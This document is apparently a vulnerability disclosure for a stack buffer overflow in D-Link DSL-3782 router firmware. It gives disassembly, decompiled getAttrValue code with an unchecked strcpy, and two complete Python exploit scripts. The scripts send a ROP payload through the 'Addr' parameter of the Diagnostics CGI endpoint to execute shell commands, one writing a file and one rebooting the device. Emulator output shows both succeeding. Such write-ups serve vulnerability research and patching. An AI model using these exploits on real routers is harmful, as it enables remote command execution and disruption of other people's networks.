

```
.text:00474AD4
                                         $ra, 0x74($sp)
                                SW
                                         $s3, 0x70($sp)
.text:00474AD8
                                SW
                                         $s2, 0x6C($sp)
.text:00474ADC
                                SW
.text:00474AE0
                                         $s1, 0x68($sp)
                                SW
.text:00474AE4
                                         $s0, 0x64($sp)
                                SW
.text:00474AE8
                                         $gp, 0x10($sp)
                                SW
.text:00474AEC
                                         $t9, memset
                                1a
                                         <mark>$s1</mark>, $sp, 0x1C
.text:00474AF0
                                addiu
.text:00474AF4
                                move
                                         $s2, $a0
.text:00474AF8
                                         $s3, $a1
                                move
.text:00474AFC
                                         $a0, $s1
                                move
.text:00474B00
                                         $a1, $zero
                                move
                                         $t9; memset
.text:00474B04
                                jalr
                                         $a2, 0x40 # '@'
.text:00474B08
                                li
.text:00474B0C
                                1w
                                         $gp, 0x10($sp)
                                         $a2, (aDipType+4) # "Type"
                                li
.text:00474B10
.text:00474B18
                                1a
                                         $t9, getAttrValue
.text:00474B1C
                                         $a0, $s2
                                move
                                         $a1, $s3
.text:00474B20
                                move
                                jalr
                                         $t9 ; getAttrValue
.text:00474B24
.text:00474B28
                                         $a3, $s1
                                move
.text:00474B2C
                                bnez
                                         $v0, loc_474B4C
.text:00474B30
                                         $gp, 0x10($sp)
                                1w
                                         $s0, 0x1C($sp)
                                1b
.text:00474B34
.text:00474B38
                                li
                                         $v0, 0x70 # 'p'
.text:00474B3C
                                         $s0, $v0, loc_474B70
                                beq
.text:00474B40
                                li
                                         $v0, 0x74 # 't'
                                         $s0, $v0, loc_474B74
.text:00474B44
                                beq
                                la
.text:00474B48
                                         $t9, memset
.text:00474B4C
.text:00474B4C loc 474B4C:
                                                           # CODE XREF: .text:00474B2C1j
.text:00474B4C
                                                           # .text:00474BAC↓j ...
                                         $v1, 0xFFFFFFF
.text:00474B4C
                                1i
.text:00474B50
.text:00474B50 loc_474B50:
                                                           # CODE XREF: .text:00474BB8↓j
.text:00474B50
                                                           # .text:00474C34↓j ...
                                         $ra, 0x74($sp)
.text:00474B50
                                lw
.text:00474B54
                                         $v0, $v1
                                move
.text:00474B58
                                         $s3, 0x70($sp)
                                1 w
                                         $s2, 0x6C($sp)
.text:00474B5C
                                lw
                                         $s1, 0x68($sp)
.text:00474B60
                                lw
.text:00474B64
                                1<sub>w</sub>
                                         $s0, 0x64($sp)
.text:00474B68
                                jr
                                         $ra
.text:00474B6C
                                addiu $sp, 0x78
.text:00474B70 # ----
.text:00474B70
.text:00474B70 loc_474B70:
                                                           # CODE XREF: .text:00474B3C1j
                                la
                                         $t9, memset
.text:00474B70
.text:00474B74
.text:00474B74 loc_474B74:
                                                           # CODE XREF: .text:00474B441j
                                         $v0, 0x4C # 'L'
.text:00474B74
                                lui
                                         $a0, <mark>$s1</mark>
.text:00474B78
                                move
.text:00474B7C
                                         $a1, $zero
                                move
                                         $a2, 0x40 # '@'
.text:00474B80
                                li
                                jalr
.text:00474B84
                                         $t9 ; memset
                                         $s0, byte_4C01E0
.text:00474B88
                                sb
                                         $gp, 0x10($sp)
.text:00474B8C
                                1<sub>w</sub>
.text:00474B90
                                lui
                                         $a2, 0x4A # 'J'
.text:00474B94
                                         $a0, $s2
                                move
.text:00474B98
                                la
                                         $t9, getAttrValue
                                         $a1, $s3
.text:00474B9C
                                move
                                                         # "Addr"
.text:00474BA0
                                li
                                         $a2, aAddr
                                jalr
.text:00474BA4
                                         $t9 ; getAttrValue
.text:00474BA8
                                         $a3. $s1
                                move
```

```
.text:00474BAC bnez $v0, loc_474B4C 
.text:00474BB0 lw $gp, 0x10($sp)
```

The getAttrValue method at .text: 0x474bA4 can lead to a stack-based buffer overflow.

Code in getAttrValue

The dst parameter (a4) of strcpy corresponds to the \$a3 register in the above picture, which comes from the \$s1 register, and the \$s1 register stores an offset address in stack (at .text: 474af0).

```
1 int __fastcall getAttrValue(int a1, char *a2, int a3, char *a4)
 2 {
 3
   int v8; // $s1
   int v9; // $v0
  char *v10; // $a2
 5
   int v11; // $a3
    int result; // $v0
 7
    const char *v13; // $a1
 8
 9
10
   v8 = 0;
11
    do
12
13
     v9 = *a2;
14
     v10 = a2;
15
     v11 = 0;
16
      ++v8;
17
     a2 += 16;
     if (!v9)
18
19
        break;
      a1 = mxmlFindElement(a1, a1, v10, 0, 0, -1);
20
21
22
    while ( v8 != 3 );
23
   result = -1;
24
    if ( a1 )
25
     v13 = (const char *)mxmlElementGetAttr(a1, a3, v10, v11);
26
27
     result = -2;
      if ( v13 )
28
29
      {
        strcpy(a4, v13);
30
        result = 0;
31
32
      }
33
34
    return result;
35 }
```

exp

```
import requests
import urllib
from pwn import *
context.binary = "../_DSL-3782_A1_EU_1.01_07282016.bin.extracted/squashfs-root/userf
context.endian = "big"
context.arch = "mips"
main_url = "http://192.168.1.1:80"
def login():
    s = requests.Session()
    s.verify = False
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/5
        }
    url = main_url + "/cgi-bin/Login.asp?User=admin&Pwd=admin&_=1640832458081"
    resp = s.get(url,headers=headers,timeout=10)
    print resp.text
def get_session_key():
    s = requests.Session()
    s.verify = False
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/5
        }
    url = main_url + "/cgi-bin/get/New_GUI/get_sessionKey.asp"
    resp = s.get(url,headers=headers,timeout=10)
    sessionKey = resp.text
    return sessionKey
def exp(sessionKey=None):
    libc_base = 0x2b50b000
    system_offset = 0x59bb0
    system_addr = libc_base + system_offset
    gadget_offset = 0x0001656C
    gadget_addr = libc_base + gadget_offset
    cmd = "echo yab. > /tmp/1"
    padding = "a" * 72
    s0 = p32(system_addr)
    s1 = "AAAA"
    s2 = "BBBB"
```

```
s3 = "CCCC"
    ra = p32(gadget_addr)
    padding2 = "A" * 16
    payload = padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd
    s = requests.Session()
    s.verify = False
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/5
        }
    params = {
        "Type": "p", "sessionKey": urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
    url = main_url + "/cgi-bin/New_GUI/Set/Diagnostics.asp"
    resp = s.post(url,data=params,headers=headers,timeout=10)
    print resp.text
if __name__ == '__main__':
    login()
    sessionKey = get_session_key()
    exp(sessionKey=sessionKey)
```

Attack effect

```
# ls /tmp/
MT7610EEPROM.bin bssid3
RT30xxEEPROM.bin bssid_ac0
                                                      tcapi_sock
WPS_PinCode
                                    nat_num
                                                      telnet_info
                 bssid_ac1
bssid0
                 bssid_ac2
                                    number
                                                      wlanlockfd
bssid1
                 bssid_ac3
                                    number1
                  cwmp
                                    qoslockfd
bssid2
# [ 88.768000] cfg_manager/108: potentially unexpected fatal signal 11.
   88.768000]
   88.776000] Cpu 0
   88.776000] $ 0
88.776000] $ 4
                    : 00000000 1000a401 00000000 00000000
                     : 7fef9850 7fef97f8 00000000 00000000
   88.776000] $ 8
                     : 00000000 7fef9788 00020000 00000000
                   : 00000000 aafc3000 00000014 8f020928
    88.776000] $12
                    : 2b7ddbb0 41414141 42424242 43434343
   88.780000] $16
    88.780000] $20
                    : ffffffff 7fef9938 0000006e 7fef9aa0
                    : 00000000 2b7bf4d0
   88.784000] $24
   88.784000] $28 : 2b803510 7fef9928 00000007 2b79a584
    88.788000] Hi
                     : 00000000
   88.788000] Lo
                     : 00000002
                    : 2b79a584 0×2b79a584
   88.788000] epc
    88.792000] Not tainted
   88.792000] ra : 2b79a584 0×2b79a584
   88.792000] Status: 0000a413
                                   USER EXL IE
   88.792000] Cause : 10800010
88.792000] BadVA : 00000017
   88.796000] PrId : 00019300 (MIPS 24Kc)
# ls /tmp/
                  bssid2
                                                      tcapi_sock
MT7610EEPROM.bin bssid3
                                    lcp
                                                      telnet_info
RT30xxEEPROM.bin bssid_ac0
                                    nat_num
WPS_PinCode
                 bssid_ac1
                                                      wlanlockfd
                                   number
boa-temp
                 bssid_ac2
                                   number1
                                    qoslockfd
bssid0
                  bssid_ac3
                                    rt_device
bssid1
                 CWMD
# cat /tmp/1
yab.
```

Since the command we executed in the exploit script (line 41) is echo yab. > /tmp/1, we can confirm that our attack was successful by printing the content in file /tmp/1.

In v1.03

An authenticated attacker can still use the stack-based bof to complete remote code execution of single-word commands (such as reboot).

exp

```
import requests
import urllib
from pwn import *
import os
from time import sleep

context.binary = "../new/_DSL-3782_A1_EU_1.03_04042018.bin.extracted/squashfs-root/u
context.endian = "big"
context.arch = "mips"

server = "192.168.1.1"
```

```
main url = "http://192.168.1.1:80"
def get_session_key(a):
   s = requests.Session()
   s.verify = False
   headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10 14 6) AppleWebKit/5
        "Cookie": "SESSIONID_AUTH=%s" % a
   url = main url + "/cgi-bin/get/New GUI/get sessionKey.asp"
    resp = s.get(url,headers=headers,timeout=10)
    sessionKey = resp.text
   print(sessionKey)
   return sessionKey
def exp(sessionKey=None,a=''):
    libc_base = input('libc_base:')
    system offset = 0x59bb0
    system addr = libc base + system offset
    gadget offset = 0 \times 0001656C
    gadget_addr = libc_base + gadget_offset
    cmd = "reboot"
    padding = "a" * 72
   s0 = p32(system_addr)
   s1 = "AAAA"
   s2 = "BBBB"
   s3 = "CCCC"
   ra = p32(gadget_addr)
   padding2 = "A" * 16
    payload = padding + s0 + s1 + s2 + s3 + ra + padding2 + cmd
   s = requests.Session()
   s.verify = False
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/5
        "Cookie": "SESSIONID_AUTH=%s" % a
        }
    params = {
        "Type":"t", "sessionKey":urllib.unquote(sessionKey),
        "Addr":urllib.unquote(payload)
    url = main_url + "/cgi-bin/New_GUI/Set/Diagnostics.asp"
   resp = s.post(url,data=params,headers=headers,timeout=10)
    print resp.text
```

```
if __name__ == '__main__':
    print '\n[*] Connection %r' % main_url
    a = input()
    print '[*] Getting session key'
    sessionKey = get_session_key(a)
    print '[*] Sending payload'
    exp(sessionKey=sessionKey, a=a)
    sleep(1)
    print '[*] Rebooting the target!'
    sleep(2)
    print '[*] Done!'
```

Attack effect

```
# [20836.596000] firmadyne: sys_reboot[PID: 26964 (Init)]: magic1:fee1dead, magic2:28121969, cmd:89abcdef
The system is going down NOW !!
Sending SIGTERM to all processes.
Sending SIGKILL to all processes.
Please stand by while rebooting the system.
[20840.704000] firmadyne: sys_reboot[PID: 26965 (init)]: magic1:fee1dead, magic2:28121969, cmd:1234567
[20840.708000] firmadyne: sys_reboot: removed CAP_SYS_BOOT, starting init...
```

Since the command we executed in the exploit script (line 37) is reboot , you can see that the emulator (firmadyne) is rebooting.